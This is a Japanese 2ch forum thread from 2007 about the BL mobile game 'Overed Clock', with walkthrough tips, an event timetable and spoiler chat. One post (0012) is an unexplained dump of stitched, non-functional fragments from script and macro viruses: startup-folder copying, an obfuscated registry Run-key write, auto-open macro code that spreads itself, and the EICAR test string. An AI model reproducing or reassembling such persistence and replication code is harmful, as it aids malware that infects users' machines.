X



BL@オーヴァードクロック〜誰が為に鐘は鳴る〜4
0001名無しって呼んでいいか?垢版2007/05/05(土) 16:06:15ID:???
携帯アプリゲーム「オーヴァード・クロック」について語るスレです。
マターリsage進行推奨、次スレは>>980くらいでお願いします。
質問する前に>>2や前レスを一読してください。

シナリオ : 関涼子
イラスト : ほづみりや

■前スレ■
BL@オーヴァードクロック〜誰が為に鐘は鳴る〜3
http://game12.2ch.net/test/read.cgi/ggirl/1173789577/
■関連スレ■
【携帯】ぼくとわたしの恋愛事情 Part3【アプリ】
 ※制作者が一緒の、別のゲームです
http://game9.2ch.net/test/read.cgi/ggirl/1155041376/
■公式ファンサイト■
ttp://ovc.mopa.jp/
(掲示板はSoftBank未対応)
■オーヴァード・クロック攻略まとめ@wiki(thanks756氏)■
http://www30.atwiki.jp/clock/

関連情報、タイムテーブルは>>2以降

◆注意◆
同人話、サイト話、特定のキャラ・カップリングへの話題の偏りはスレの雰囲気を悪くする場合があります。
また、新イベントの話をする時はネタバレと注意してから数行下げて書き込むようにしましょう。
それぞれ意識の片隅に置き、大人の対応をするよう心がけましょう。
0002名無しって呼んでいいか?垢版2007/05/05(土) 16:07:44ID:???
◆携帯電話会社ごとの違い◆
DoCoMo版にはアルバム機能があり、愛情EDクリア後にキャラからデコレーションメールが届きます。
ちなみに解約してもアルバムのスチルは消えません。
また他キャリアでの正面衝突(キス)絵は寸止め絵に変更されています。

SoftBank版には買い切り版があり、一度落とせば問題なく毎月更新を楽しめます。
au版にはシナリオスキップ機能があり、話が始まってからクリアキーを押せばスキップできます。
サウンドテストはSB・au版についており、メニューで*2*2と押すと選択できるようになります。


◆攻略まとめ◆
現在攻略可能なキャラは眼鏡大塚・高階後輩・叶先生・二見馨の4人。
帯刀先輩・槌谷斉はイベントのみとなっています。
分岐は2日目から始まり、同時攻略は『先生と誰か』が確実。
詳しくは攻略サイトを参照することをおすすめします。

・EDは3種類
 手紙を残す(ハート4つ以下)なら友情ED、残さない(ハート5つ)なら愛情ED
 その他のものはバッドEDとなっております

・高階を友情EDにするには1日目の公園イベントを見ない

・アルバムother23枚目は後輩の友情EDで出、other26枚目は保健室の絵です

・先生はイベントを見逃しても後半に出てくるので注意が必要です
 2日目と3日目の自室イベントや、肝試しイベント(校門→校門まで)は要注意

・肝試しは18:00丁度に校門へ、そこから順番に周りましょう
 時計塔では先生イベントが起こります

・二見攻略では基本的に高階攻略も同時進行する
 6日目朝の家の前はビックリして動けないを選択する

・6日目夕方の槌谷イベントは「必ず」16:00丁度に屋上へ、そのあと2-D→校門→公園の順に
0003タイムテーブル 1/2垢版2007/05/05(土) 16:08:23ID:???
一日目
07:00 家の前(帯刃)
08:00 2-D(高階)/校門(ニ見&槌谷--スチル)/商店街 ?
10:00 理科室(叶--スチル)/保健室(帯刃--スチル)/2-D(二見)
12:00 2-D(高階--スチル)/2-E→保健室(大塚--スチル)/時計塔(叶)
14:00 屋上(高階--スチル)/2-D(槌谷)
16:00 公園(高階--スチル)/商店街(ニ見)/保健室(帯刃)/屋上(槌谷)
18:00 自室(高階関連?)
20:00 公園(大塚--スチル)

二日目
07:00 家の前(高階--スチル)
08:00 2-E(大塚)/校門/(阿立)
10:00 学食(帯刃)/2-D(槌谷)/2-E(阿立)
12:00 屋上(高階--スチル)/2-E(大塚--スチル)/時計塔(叶--スチル)→体育館(○もう1度戻る)→時計塔(叶)
14:00 2-D(二見)
16:00 商店街(高階)/時計塔→2-D(叶--スチル)/屋上(槌谷)/公園(帯刃)
18:00 自室(高階関連?)/商店街(二見--スチル)
20:00 公園(大塚--スチル)/自室(叶関連)

三日目
07:00 家の前(高階)
08:00 2-D(大塚関連--○そうかな…?)/公園→校門前(帯刃--正しい選択肢不明)
10:00 学食(高階)/2-D(叶)
12:00 体育館(高階--スチル)/時計塔(叶)/2-E→保健室(大塚--スチル)
14:00 2-D(帯刃)
16:00 公園(高階)/理科室(叶)/屋上(槌谷--スチル)
18:00 商店街(二見)/自室(帯刃)
20:00 理科室(叶 ※強制就寝イベント)/公園(大塚)


0004タイムテーブル 2/2垢版2007/05/05(土) 16:09:31ID:???
四日目
07:00 家の前(帯刃関連)/校門(ニ見)
08:00 2-D(高階)/2-E(大塚)/公園(帯刃関連)
10:00 2-D(叶→18:00の校門へ)/2-D→学食(帯刃)
12:00 屋上(高階--○嫌いじゃない)/時計塔(叶--スチル)/2-D(大塚--スチル ○ハッキリ聞いてみる)
14:00 体育館(帯刃)
16:00 校門(高階--○三人で帰る)/理科室(叶)/屋上(槌谷)/公園(帯刃--スチル)
18:00 校門→学食→体育館→時計塔→校門(叶スチル)/自室(帯刃--スチル)
20:00 公園(大塚--スチル)/自室(二見--スチル)

五日目
07:00 商店街(二見)
10:00 時計塔(叶)
12:00 理科室(叶)/2-E(大塚)/体育館(高階--スチル ○声をかける)
14:00 屋上(二見--スチル 12:00の高階イベント必須)
16:00 2-D(叶ルート→18:00の理科室へ)/2-D(大塚)/ 校門(高階)
18:00 理科室(叶--スチル)/公園(二見--○声をかけない)
20:00 公園(大塚)/2-D(槌谷--○探しに行く 18:00の叶イベント必須)→屋上(槌谷--スチル)

六日目
07:00 家の前(高階--○無理矢理振りほどく ※強制就寝イベント 二見--○ビックリして動けない)
08:00 理科室 (叶)/2-E(大塚)/2-D(二見)/校門(槌谷--スチル)
10:00 2-D(ニ見--スチル)/保健室(槌谷)
12:00 時計塔 (叶)(二見)/2-E→保健室(大塚--スチル)
14:00 2-D(叶)/屋上(二見)
16:00 商店街(少年)/時計塔(二見--スチル)/屋上→校門→公園(槌谷--スチル)
18:00 時計塔(叶--スチル)/公園(二見--スチル)
20:00 公園(大塚)/自室(二見)

七日目
07:00 2D→保健室(二見)/校門(槌谷)
08:00 理科室(叶)
10:00 2-D(叶)/保健室(槌谷)
12:00 時計塔(叶)/2-E→保健室(大塚)/屋上(二見--5日目の16:00の高階イベント必須)
14:00 理科室(叶)/2D→保健室→屋上→時計塔(二見--スチル)
16:00 2-D(叶)/商店街(二見)/校門(大塚)/公園
18:00 保健室(大塚--スチル)/自室(二見)
20:00 自室 (叶--スチル)


※2007年5月更新分まで
0006名無しって呼んでいいか?垢版2007/05/05(土) 16:39:19ID:???
>>1
乙!

コミック版の主人公の名前が「要」だったから
その通りに名前変更してプレイしてたら…
新キャラとして出てきちゃったのかorz
0009名無しって呼んでいいか?垢版2007/05/05(土) 21:57:51ID:???
ネタバレ





阿立の正体は別としても、阿×主に萌え
いっつんEDはいっつんが時計塔に願う事になるのかな
0011名無しって呼んでいいか?垢版2007/05/06(日) 01:14:33ID:???
>>9
ネタバレ





よくわかってないいっつんの代わりに友情EDでは主が死んだりするかもね
なーんちゃってで済むといいけど
0012名無しって呼んでいいか?垢版2007/05/06(日) 07:45:05ID:???
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub
0013名無しって呼んでいいか?垢版2007/05/06(日) 07:45:19ID:???
>>9






新キャラ不安で仕方なかったけど、ちょっと少年ぽいせいもあってか、
まあ正体がなんであれ阿×主も段々…少し萌えてきた
ていうか一年は特にすごい癖のある奴ばっかだな…
0017名無しって呼んでいいか?垢版2007/05/07(月) 04:39:49ID:???
あんな二人がいるクラスってなんかカオスだなw

7日目保健室いっつんでちょい疑問
バレなので下げます








二見が「しゃく」って言ってたのは、主に対して?
それともいっつんに対して?
二見→いっつん設定なのか、二見→主設定なのかいまいち判別つかなくて
主がやなやつじゃないから、って事でいいんだよね?
にしても、二見ルートで、二見がいきなり斉呼びした意味がわかってよかった
はやくいっつんEND来ないかね…
0018名無しって呼んでいいか?垢版2007/05/07(月) 04:46:13ID:???
>>17
ネタバレ






あれは槌×主←二見ってことだと思った
いっつんが嫌なやつじゃないから主人公を奪うに奪えない、っていう
やっぱ嫌なやつっていうのは高階某みたいなやつなんだろかw
0019名無しって呼んでいいか?垢版2007/05/07(月) 16:35:09ID:D9ZG1BtK
>>18
ネタバレ





自分もそうだとオモ
主の気持ちは別として、高階某からだったら奪ってたなw
002017垢版2007/05/08(火) 00:05:52ID:???
>>18-19
d!
バレ










確かに高橋某なら奪っちゃいそうだな、二見w
基本槌主←二見設定なんだね、やっぱり
いっつんイベ見ていっつんが可愛くて仕方ない
主槌もアリだな自分は。
いっつん可愛いよいっつん
0021名無しって呼んでいいか?垢版2007/05/08(火) 15:36:15ID:???
ネタバレ












自分はてっきり、主が嫌な奴じゃないから邪魔出来ないのかと思ってた
二見のいっつんへの親心みたいなものかと…
「お前みたいな奴にはうちの子はやらん!!」みたいなww
0026名無しって呼んでいいか?垢版2007/05/09(水) 02:06:42ID:4/Dn9BqV
阿立 イマイチ出てきてる目的がわからないのだけど
これから絡むの? オマケ?
0028名無しって呼んでいいか?垢版2007/05/09(水) 09:50:56ID:???
自分もだー
主が最萌えだから漫画にはちとがっかり
漫画にもチラッとでいいから出てきてほしいよ…
0029名無しって呼んでいいか?垢版2007/05/09(水) 10:56:24ID:???
漫画でゲームの主人公がメインになってもぼくわたみたいに手抜きされるのかと思うと凹むけどやっぱり主人公は出してほしい(´・ω・`)
0031名無しって呼んでいいか?垢版2007/05/09(水) 17:29:03ID:???
ぼくわたマンガ読んでないのにあれだけど、
その失敗を踏まえた上で主人公君外したんじゃないかな?
それに阿達は神の視点かもしれないし、
第三者から見た主人公君とかキャラの隠れた性格とか確執とかを描きたいのかもしれないじゃないか

だから今は楽しみに発売日を待とうよ
自分は単行本出るまで読まないけど
0034名無しって呼んでいいか?垢版2007/05/10(木) 00:38:36ID:???
二見の愛情ED見たくてまた最初からやってんだけど
4日目12時からの高階の屋上イベントと、6日目7時からの家の前でのイベントがどうしても発生しない…なんでだーorz
0036名無しって呼んでいいか?垢版2007/05/10(木) 03:36:08ID:???
漫画、ゲームの主人公いないと成り立たないし、出ないことはないんじゃないかなー。

あー高階と買い物行って、先輩!これなんかどうですか?
とか言われたいW
0038名無しって呼んでいいか?垢版2007/05/10(木) 10:45:35ID:???
全員総当たりでもふつうに起こるけど、
他キャラを攻略しすぎるとダメ、ってやつかもよ
高階だけに絞ってみたら?
0040名無しって呼んでいいか?垢版2007/05/10(木) 16:28:05ID:???
茸は愛するBL★美少年だよ
…だから露骨なタイトルはやめてくれと何度言ったら…
ある意味クロックのボーイズラブってタイトルより痛い
0042名無しって呼んでいいか?垢版2007/05/10(木) 18:50:18ID:???
友達同士でどんなゲームが入ってる?って会話になった時ヤバいw

だから俺はアプリをカードに移してるw
わざわざカードに隔離してあるアプリがあるとは誰が想像しようか。
0043名無しって呼んでいいか?垢版2007/05/10(木) 19:41:39ID:???
>40
落としてないから公式タイトルで推察したんだけど、それはないなw
名付けた人は何を考えてるんだろう
ちなみに恋する〜はau

アプリは画像表示大にしてedyとかに紛れた奥に移動してる
撹乱用にテトリス何個か入れてるから不意打ちにも対応
0049名無しって呼んでいいか?垢版2007/05/11(金) 11:44:45ID:???
忘れてたどころか知らなか(ry
会長おめでとう!





今二見友情攻略したんだけど、鬱で死にそうorz
デコメ見たらさらに切ない
あれってまだ生きてる?
ガラスがどうとか言ってたし…
0052名無しって呼んでいいか?垢版2007/05/11(金) 21:15:45ID:???
そもそもデコメが良く判らないんだけど…
携帯電話のCMで見るような派手なメール(ハートが乱舞してたり)を叶先生が送ってきたりするの?
0055名無しって呼んでいいか?垢版2007/05/12(土) 02:40:46ID:???
そういうのあるからドコモうらやましいよなぁ…
けど正面衝突しないらしいし…。
auは正面衝突するしシナリオスキップあるしうまくまとまってる。
バンクは実行速度すら選べないしアプリトップからファンサイトにすら飛べない。

ドコモ≧au>>>>>>>>>>>>バンクだな。
今度携帯変えるときはドコモにしようwww
0057名無しって呼んでいいか?垢版2007/05/12(土) 03:40:53ID:???
目当てのキャラだけならデコメよかったし萌えた
正面衝突絵が英雄にあるなんてこのスレ読むまで知らなかった……焦らし行為かと
茸ユーザーとしても見たいし機種変したい
0058名無しって呼んでいいか?垢版2007/05/12(土) 08:50:23ID:???
自分も茸で正面衝突がいいなーと常々思ってたけど、いっつんとの正面衝突をバナーで見てからは未練がなくなったw
寸止めの方がエロイよ
0062名無しって呼んでいいか?垢版2007/05/12(土) 20:03:11ID:???
英雄なんだけど機種変したら対応してなくて、ようやく対応したから
やりこむつもりで始めたらあっという間に通信制限の上限に……orz

他会社ってこういう制限あるの?
0068名無しって呼んでいいか?垢版2007/05/12(土) 23:03:54ID:???
アプリの通信量に上限があるみたいで、
越えると1時過ぎるまで通信出来なくなる
たとえエンディングの真っ最中でも問答無用で止められるw
0069名無しって呼んでいいか?垢版2007/05/12(土) 23:15:37ID:???
英雄羨ましいと思ってたけどそれはキツイ……
こまめにやれと言う事? そんな忍耐力は無い……orz
0071名無しって呼んでいいか?垢版2007/05/13(日) 00:56:26ID:???
俺もauだけど、制限かかったことが無い。
大体どれくらいやってると制限かかる?


あと、auでもソニーの端末にはシナリオスキップ付いてないっぽい。
0072名無しって呼んでいいか?垢版2007/05/13(日) 00:59:38ID:???
>>49です






>>50
私は号泣した
ゲームで初めて泣いたw

>>51
見てきます

>>53
やっぱり死んでないのか
私もメールみてどっちかわかんなくなった
愛情でも一緒の文面だし、まあ仕方ないっちゃ仕方ないか
0074名無しって呼んでいいか?垢版2007/05/13(日) 02:57:21ID:???
>71
2周全部見るぐらいしないとならないような…どうだったかな
最近はスキップしまくってるから規制されないw
0076名無しって呼んでいいか?垢版2007/05/13(日) 05:20:50ID:???
>>71
1時の規制解除から今までずっとやってて、今規制かかったwww
大塚でまず1周、叶と二見を同時にちょこちょこスキップしながらやって、
2週目の7日目午前まで。生殺しだ……
0077名無しって呼んでいいか?垢版2007/05/13(日) 15:21:19ID:???
>>73
バンク、auを渡り歩いて両方堪能した自分は今デコメのあるドコモにしたいw
誰か止めてくれw

>>74
じゃあプレイ中に寝てしまって、リアルに1日に1日分しか進まない自分は大丈夫そうw
シナリオスキップうらやましい…
ソニーよなぜシナリオスキップを付けないのか…

>>76
ある意味ドコモの寸止めよりキツいかもw
0080名無しって呼んでいいか?垢版2007/05/14(月) 00:00:20ID:???
攻略法何度見ても叶先生の真EDたどり着けない。
もう伝言EDは見飽きた。他にも見れない人がいるみたいだが、五月になって見れた人いる?
ちなみに機種はau
0083名無しって呼んでいいか?垢版2007/05/15(火) 00:18:20ID:???
ネタバレ













"|ヽ||'、ゝ^|ノ△〜☆チーンと…
ノ*'∀'*)ノ□マフラードゾー
゚+。^_ゝ^)Ц~~茶でも飲まないか?(ビーカー)
∪*゚дゝ゚∪イエローなんです!!


朋臣とかいちょ随時募集
0085名無しって呼んでいいか?垢版2007/05/15(火) 08:47:29ID:???
>>84
ありがとう。やってみたらできたよー
以下ネタバレ











展開えろくてびびったw
ぜひともPCゲーにしてほしい
二見いいよ二見
0087名無しって呼んでいいか?垢版2007/05/15(火) 09:51:30ID:???
>>80
同じくアウ
昨夜試したら先生愛情EDみれたので、wikiみて
見落としないか確認してガンガレ 個人的にあのスチルは好きだw
0088名無しって呼んでいいか?垢版2007/05/15(火) 18:32:49ID:???
>>81>>87
アリガd!
wikiもタイムテーブルも攻略法も見てプレイしたが、やっぱり伝言EDだったよ…
自分の見落としだったら恥ずかしいけど、エイチムの対応を待つことにします
0089名無しって呼んでいいか?垢版2007/05/18(金) 09:40:03ID:???
ネタバレ







友情EDと愛情EDのデコメって同じなんだ
違うのがあるかと思ってたよ
二見乙女…!後輩の友情EDいいな
0093名無しって呼んでいいか?垢版2007/05/20(日) 03:27:08ID:???
漏れ英雄のソニィだけどクリアキーでスキップ出来るよ?


あと制限かかったことは無いな…通信制限かけてもダメか?
0095お聞きしたいんですが垢版2007/05/20(日) 17:54:23ID:vMu/EAQ6
アルバム機能って愛情攻略しないと見れないんですか?
ドコモなんですけど、スチルアルバムがどこにあるのかわからなくて…
0096名無しって呼んでいいか?垢版2007/05/20(日) 18:11:33ID:???
>>95
ゲームアプリを落としたのと同じページの下の方で
アルバムアプリがダウソ出来る。

確かクリア時にアルバムアプリの情報貰って初めて知ったから、
愛情や友情クリア前にそのページで落とせるかは分からない。
レスを投稿する


ニューススポーツなんでも実況